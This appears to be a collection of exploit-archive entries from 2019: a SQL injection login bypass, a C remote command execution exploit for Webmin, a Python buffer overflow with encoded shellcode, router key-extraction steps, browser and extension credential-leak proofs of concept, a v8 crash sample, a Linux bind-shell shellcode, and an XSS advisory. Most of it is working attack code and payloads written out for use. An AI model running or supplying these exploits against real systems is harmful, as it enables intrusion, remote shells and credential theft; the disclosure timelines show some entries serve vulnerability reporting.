# Exploit Title: College-Management-System 1.2 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
# Tested Version: 1.2
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Easy authentication bypass vulnerability on the application 
# allowing the attacker to log in as the school principal.

# Simply replay the below Burp request or use Curl.
# Payload: ' or 0=0 #

POST /college/principalcheck.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/college/principalcheck.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

emailid='%20or%200%3d0%20#&pass=asdf

////////////////////////////////////////////////////////////////////////////////////////////////
// Webmin 1.920 Remote Code Execution Exploit CVE_2019_15107.c muBoT Cut
// written in C by BoSSaLiNiE
//
// Step 1
// wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
//
// Step 2
// dpkg -i webmin_1.920_all.deb
//
//
// Step 3
// sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
//
// Step 4
// gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
//
// ./CVE_2019_15107 10.0.0.14 "uptime"
// https://10.0.0.14:10000/password_change.cgi
// 16:16:38 up 22:15,  0 user,  load average: 0.00, 0.00, 0.00
//
///////////////////////////////////////////////////////////////////////////////////////////////

#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

int main(int argc,char* argv[])
{
  CURLU *h;
  CURL *curl;
  CURLcode res;
  struct sockaddr_in servaddr;  /*  socket address structure  */ 
  curl_socket_t sockfd;

  char buffer[200];
  char scanip[20];
  char *host;
  char *path;
  char ref[100];
  char url[100];


  struct string {
    char *ptr;
    size_t len;
  };

  void init_string(struct string *s) {
    s->len = 0;
    s->ptr = malloc(s->len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "malloc() failed\n");
      exit(EXIT_FAILURE);
    }
    s->ptr[0] = '\0';
  }

  size_t writefunc(void *ptr, size_t size, size_t nmemb, struct string *s)
  {
    size_t new_len = s->len + size*nmemb;
    s->ptr = realloc(s->ptr, new_len+1);
    if (s->ptr == NULL) {
      fprintf(stderr, "realloc() failed\n");
      exit(EXIT_FAILURE);
    }
    memcpy(s->ptr+s->len, ptr, size*nmemb);
    s->ptr[new_len] = '\0';
    s->len = new_len;

    return size*nmemb;
  }


  curl_global_init(CURL_GLOBAL_DEFAULT);
  curl = curl_easy_init();

  if(curl) {
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L);
    struct curl_slist *headers=NULL;


    struct string s;
    init_string(&s);

    headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate");
    headers = curl_slist_append(headers, "Accept: */*");
    headers = curl_slist_append(headers, "Accept-Language: en");
    headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");
    headers = curl_slist_append(headers, "Connection: close");
    headers = curl_slist_append(headers, "Cookie: redirect=1; testing=1; sid=x; sessiontest=1");
    //  headers = curl_slist_append(headers, "Referer: https://192.168.233.134:10000/session_login.cgi");      
    headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");
    headers = curl_slist_append(headers, "Content-Lenght: 60");
    headers = curl_slist_append(headers, "cache-control: no-cache");

    sprintf(url, "https://%s:10000/password_change.cgi", argv[1]);
    sprintf(ref, "https://%s:10000/session_login.cgi", argv[1]);

    curl_easy_setopt(curl, CURLOPT_REFERER, ref);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers );
    curl_easy_setopt(curl, CURLOPT_VERBOSE, 0);
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writefunc);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &s);

    char b64str[100000] = {0};
    sprintf(b64str, "user=rootxx&pam=&expired=2&old=%s&new1=test2&new2=test2",argv[2]);

    curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "POST");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, b64str);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0);
    //  curl_easy_setopt (curl, CURLOPT_TIMEOUT, 10L);

    res = curl_easy_perform(curl);

    //////////////////////////FILTER//////////////////////////

    //  puts(s.ptr);
    const char *x = s.ptr;
    const char *PATTERN1 = "<center><h3>Failed to change password : The current password is incorrect";
    const char *PATTERN2 = "</h3></center>";

    char *target = NULL;
    char *start, *end;

    if ( start = strstr( x, PATTERN1 ) )
    {
      start += strlen( PATTERN1 );
      if ( end = strstr( start, PATTERN2 ) )
      {
        target = ( char * )malloc( end - start + 1 );
        memcpy( target, start, end - start );
        target[end - start] = '\0';
      }
    }

    if ( target ) 
      puts(url);
    puts( target );

    free( target );

    free(s.ptr);


  }
  return 0;
}

import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7


# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"

# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"

# Stack alignment
alignment = "\x54"# push esp
alignment += "\x58"# pop eax
alignment += "\x2d\x1a\x50\x55\x55"# sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55"# sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55"# sub eax, 0x1a4e5555
alignment += "\x50"# push eax
alignment += "\x5c" # pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41

# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero# zero out eax
shellcode += "\x2d\x55\x15\x4f\x53"# sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53"# sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53"# sub eax, 0x53500157
shellcode += "\x50"# push eax

# 4F554A42 4F554A42 51554B44
shellcode += zero# zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f"# sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f"# sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51"# sub eax, 0x51554b44
shellcode += "\x50"# push eax

# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15"# sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15"# sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17"# sub eax, 0x173b3b3b
shellcode += "\x50"# push eax

# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero# zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a"# sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a"# sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b"# sub eax, 0x3b3b0229
shellcode += "\x50"# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero# zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"# sub eax, 0x403d4040
shellcode += "\x50"# push eax

# 323A1A27 323A0227 333B0229
shellcode += zero# zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32"# sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32"# sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33"# sub eax, 0x333b0229
shellcode += "\x50"# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                               # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"             # sub eax, 0x403d4040
shellcode += "\x50"                             # push eax

# 323A1545 323A1545 333B1545
shellcode += zero# zero out eax
shellcode += "\x2d\x45\x15\x3a\x32"# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32"# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33"# sub eax, 0x333b1545
shellcode += "\x50" # push eax

# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06"# JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874)# pop ebp pop ebx ret reg.dll
payload += "\x41" * 2# Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))

# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()

# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140

# Description:
Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
firmwares routers have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.

# Attack Vectors:
To get success on the exploitation, two components are mandatory: 1.
the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
encrypted file can be downloaded via HTTP URL offered by Adamo ISP
(works from any external network). Then is need to interact with the
router using WebSocket protocol to obtain the 3DES key, a web browser
like Firefox can be used as WebSocket client under the developer
tools. Session id is acquired with the same username and password of
the router (in this case, password is the same as wifi defaults). Once
3DES key is obtained through a JSON request command, .enc file can be
decrypted with the help of openssl tool.

# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communcatie by Sockets
- Using Firefox, open the router’s webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Let’s create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request an ID session with the same login parameters that when access
to the router’s website. (put your wifis router password instead of
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now, you will obtain a response, the value of the parameter that says
“ubus_rpc_session” refers to your session’s ID, copy it to use in the next
request call.
- Requesting information about the router’s System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
It’s 16 digits that we need convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s 

# Additional Information:
A packet sniffer like Wireshark can be used for retrieve the 3DES key
instead of using WebSocket communication protocol. In that case, user
needs to do the login on the router's page, and then the JSON request
containing the 3DES key will be catched.

# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all

# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published

lastpass: bypassing do_popupregister() leaks credentials from previous site

I noticed that you can create a popup without calling do_popupregister() by iframing popupfilltab.html (i.e. via moz-extension, ms-browser-extension, chrome-extension, etc). It's a valid web_accessible_resource.

Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab.

I don't consider this a *critical* issue, because I don't think there's a way to control which site you leak credentials from (just the last visited site), but it does seem serious enough to fix.

To reproduce the issue:

1. Go to a site you have credentials saved for and click the little \"...\" icon.
2. Go to https://example.com
3. Enter this in the console:

y = document.createElement(\"iframe\");
y.height = 1024;
y.width = \"100%\";
y.src=\"chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html\";
// or y.src=\"moz-extension://...\";
// or y.src=\"ms-browser-extension://...\";
document.body.appendChild(y);  


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: taviso@google.com

v8 Map migration doesn't respect element kind, leading to type confusion

The following sample, found by Fuzzilli and manually simplified, crashes d8 built from HEAD in both debug and release configuration:

    function main() {
        const v2 = {foo:1.1};
        Object.seal(v2);
        Object.preventExtensions(v2);
        Object.freeze(v2);
        const v12 = {foo:2.2};
        Object.preventExtensions(v12);
        Object.freeze(v12);
        const v18 = {foo:Object};
        v12.__proto__ = 0;
        v2[5] = 1;
    }
    main();

In release builds, this sample will often crash when dereferencing an invalid address. In debug builds this will crash with a failed DCHECK: \"# Debug check failed: fixed_array.IsNumberDictionary(isolate)\". Another DCHECK can be triggered earlier on when the --verify-heap flag is used.

I have only very briefly analyzed this crash. Roughly what appears to be happening is that during the IC cache miss caused by the final element store, v2 is transitioned to a new Map (as the old one was deprecated when v18 was created). During that transition, happening in JSObject::MigrateInstance, v8 somehow fails to account for the changed element kind, which in this case switches from fast elements ([HOLEY_FROZEN_ELEMENTS]) to DICTIONARY_ELEMENTS (which are now used due to the modified prototype). As such, afterwards, v8 assumes that the elements_ pointer of v2 point to a NumberDictionary while in reality it still points to a FixedArray. A type confusion follows. As the content of the FixedArray (and its size) are controllable during this crash, I assume this bug to be exploitable.
In release builds, this PoC then appears to crash when v8 tries to fetch an element from the thought-to-be dictionary as the size of the dictionary (really the first element in the FixedArray) is some large number.

According to clusterfuzz, this bug affects current Stable and Beta releases.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: saelo@google.com

# Exploit Title:  Microsoft Windows 'Internet Settings' Misconfiguration Security Feature Bypass Vulnerability

# Google Dork: N/A

# Date: September, 17 2019

# Exploit Author:  Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: Windows 7 SP1, 8.0, 8.1 x86 and x64 with full patches up to July 2019

# Tested on: Windows 7 SP1, 8.0, 8.1 x86 and x64 with full patches up to July 2019

# CVE : n/a


Details: A recent setting has been introduced to the 'Internet settings' of Windows that applies to MS IE and several programs that utilize its libraries

which can enable or disable the VBScript engine on a per-zone basis. On the Registry:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\X


value: 140C

type: DWORD

data: 0  (0= allow | 1= prompt | 3 = disallow)

where 'X' is an integer between 0 and 4, and they are related to security zones. It´s permitted by default on 'Local Intranet', 'Trusted Sites' and 'Local Machine' and disabled by default on 'Internet' and 'Restricted Sites'


The misconfiguration issue happens because on the affected Windows versions, the setting was defined to '0' (Allow) when it should be '3' (disallow).

The impact is permitting web pages to invoke VBScript engine on security zones that should not be allowed.


To make sure this setting is on its default on all supported OSes, one can run the following commands (from eg. 'Run' menu or CMD prompt)

%comspec% /k reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f

%comspec% /k reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f

%comspec% /k reg add "HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 140C /t REG_DWORD /d 3 /f


Vendor was contacted on July 11, 2019.

Vendor replied on July 15, 2019 saying the issue was successfully reproduced and would be fixed on August, 2019 monthly patch.

Officially patched on August, 2019 (on the cumulative update for MS IE)


Warning: on Windows 7 machines, it might be necessary to run the above commands because the setting is also defined on HKEY_CURRENT_USER registry key which will take over HKEY_LOCAL_MACHINE.

---------------------------
Packet Storm Editor's Note: To normally view passwords in Chrome, you have to go to the Properties section, click View Passwords, and you are prompted for a users password.  This flaw discloses all passwords for the domain without the required authentication step.
---------------------------

Please see https://secureli.com/2019/09/15/password-leak-version-76-0-3809-132-official-build-64-bit/ for all information, including pictures:

When a plain-text password form field is found by Google Chrome, it will reveal all passwords on that primary domain.

For example, take a look at the following code and screenshot:

<input class="form-control secure_password required password fs-hide" data-install-name="secureli" id="ftp_user_pass_new" required="required" aria-required="true" autocomplete="new-password" type="text" name="ftp_user[pass]">
By checking the “Show Password” button, as shown below…

--- screenshot ---

…the auto-complete function in Chrome is activated and clicking on the password field shows a drop-down of all passwords saved on that domain:

--- screenshot ---

#---------------------- DESCRIPTION -------------------------------------#

; Title: Linux/x86 bind tcp shellcode (port 43690) null-free 
; Author: Daniel Ortiz
; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
; Size: 53 bytes
; SLAE ID: PA-9844



section .DATA

section .BSS


section .TEXT

global _start

  _start:

  ; int socket(int domain, int type, int protocol); 

  xor eax, eax
  xor ebx, ebx
  cdq

  push eax              ; protocol - 0
  push byte 0x1         ; type - SOCK_STREAM
  push byte 0x2         ; dominio - AF_INET

  mov ecx, esp          
  inc bl                ; sys_socket 
  mov al, 102           ; socketcall system call
  int 0x80

  mov esi, eax ; save the socketfd

  ; bind(soc, (struct sockaddr *)&srv_addr, 0x10)


  push edx
  push word 0xAAAA
  push word 2
  mov ecx, esp
  push byte 0x10        ; last argument
  push ecx              ; pointer to the structure
  push esi              ; socketfd 
  mov ecx, esp    
  inc bl                ; bl contains 2
  mov al, 102
  int 0x80


  ; int listen(int sockfd, int backlog);

  push edx
  push esi
  mov ecx, esp
  mov bl, 0x4         ; bl contains 4
  mov al, 102
  int 0x80

  ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)

  push edx
  push edx
  push esi            ; socketfd
  mov ecx, esp
  inc bl              ; bl contains 5 
  mov al, 102
  int 0x80
  mov ebx, eax

  ; int dup2(int oldfd, int newfd, int flags);

  xor ecx, ecx
  mov cl, 3
  l00p:
    dec cl
    mov al, 63
    int 0x80
    jnz l00p


  ; int execve(const char *filename, char *const argv[],char *const envp[]) 

  push edx
  push long 0x68732f2f
  push long 0x6e69622f
  mov ebx, esp
  push edx
  push edx
  mov ecx, esp
  mov al, 0x0b
  int 0x80


  ; exit syscall
  xor eax, eax
  mov al, 0x1
  mov bl, 0x8
  int 0x80

/*

shellcode.c program 

*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0\x66"
"\xcd\x80\x89\xc6\x52\x66\x68\xaa\xaa\x66\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
"\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x52\x89\xe1\xb0\x0b"
"\xcd\x80\x31\xc0\xb0\x01\xb3\x08\xcd\x80";              


main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
              title: Reflected Cross-Site Scripting (XSS)
            product: Oracle Mojarra JSF included in Java EE 7
                     Eclipse Mojarra JSF
 vulnerable version: 2.2 & 2.3
      fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
                     https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
                     https://github.com/eclipse-ee4j/mojarra
         CVE number: -
             impact: Medium
           homepage: https://javaserverfaces.github.io/
              found: 2018-11-12
                 by: Jean-Benjamin Rousseau (Office Zurich)
                     Guillaume Crouquet (Office Zurich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reuseable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers.  This project provides information
on the continued development of the JavaServer Faces specification.

JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."

Source: https://javaee.github.io/javaserverfaces-spec/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.

SEC Consult recommends users to implement the available patches.


Vulnerability overview/description:
-----------------------------------
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3
lacks input validation on the javax.faces.ClientWindow parameter which can
lead to reflected cross-site scripting (XSS) under certain conditions.

Mojarra JSF v2.2 and v2.3 are respectively the user interface
standards for Java EE 7 and Java EE 8.

The vulnerability is not directly exploitable in Mojarra JSF v2.2
and v2.3. However, different frameworks based on this library and having
a custom implementation of the Faces-Request HTTP headers for AJAX requests
might be affected. PrimeFaces v6.0 is one example of a vulnerable framework.

This vulnerability affects the web applications fulfilling the following
conditions:
 - Usage of a framework based on Mojarra JSF v2.2 or v2.3
 - Usage of AJAX requests in the web applications
 - Custom implementation of the Faces-Request HTTP headers for AJAX requests
 - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter
   set to "url" in the web.xml file:

<context-param>
<param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
<param-value>url</param-value>
</context-param>


Proof of concept:
-----------------
In this proof of concept, the tests are based on PrimeFaces v6.0,
an open source framework for JSF. Other frameworks based on
Mojarra JSF 2.2 or 2.3 might also be affected.

Step 1: Generate an AJAX request on the web application and intercept it.
-----------
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close

javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
-----------

Step 2: Transpose the POST parameters into GET parameters and
build a new URL with it.

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0


Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.

http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0


Step 4: Prefix the javax.faces.ClientWindow GET parameter with
the following PoC payload:

]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC
Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[

Resulting URL:

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC+Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[2a616ef87aeed7521b02ceb4e163%3A0


Step 5: To trigger the XSS, the victim just needs to browse to the crafted link
of step 4.


Vulnerable / tested versions:
-----------------------------
The following version has been tested:
* Mojarra JSF v2.2 included in Java EE 7
* Mojarra JSF v2.3 included in Java EE 8 has not been tested
  but is affected according to the vendor


Vendor contact timeline:
------------------------
Oracle:
2018-11-22: Contacting vendor through secalert_us@oracle.com
2018-11-27: Initial response from Oracle. Monthly updates will be
            provided until the issue is addressed.
2018-12-15: Request from Oracle for technical details.
2018-12-17: Response with requested details
            Error in the transmission of the e-mail.
2019-01-11: Request from Oracle to delay the release date
            when a fix will be provided.
2019-01-15: Extension of the release and retransmission of the technical
            details from the previous mail.
2019-02-01: Request from Oracle to extend the release date after
            the 16th of April 2019.
2019-02-04: Extension of the release date.
2019-02-05: Acknowledgment of receipt from Oracle.
2019-04-11: Release of a fix for versions 2.2 and 2.3 of Oracle Mojarra JSF
2019-04-29: SEC Consult: fix is incomplete and only filters script tags, request
            for a CVE number and credits.
2019-04-30: Request from Oracle for details for crediting
2019-04-30: Provision of details from SEC Consult
2019-05-07: Confirmation of credits in the Oracle Critical Patch Update
            Advisory - April 2019
2019-08-30: Confirmation by Oracle that a patch has been applied


Eclipse:
2019-06-13: Contacting vendor through bugs.eclipse.org
2019-08-23: Project lead replied that he will take care of this issue
2019-08-28: Ask for an update with no response

2019-09-18: Release of security advisory


Solution:
---------
Oracle has addressed the reported issue for the versions 2.2 and 2.3:
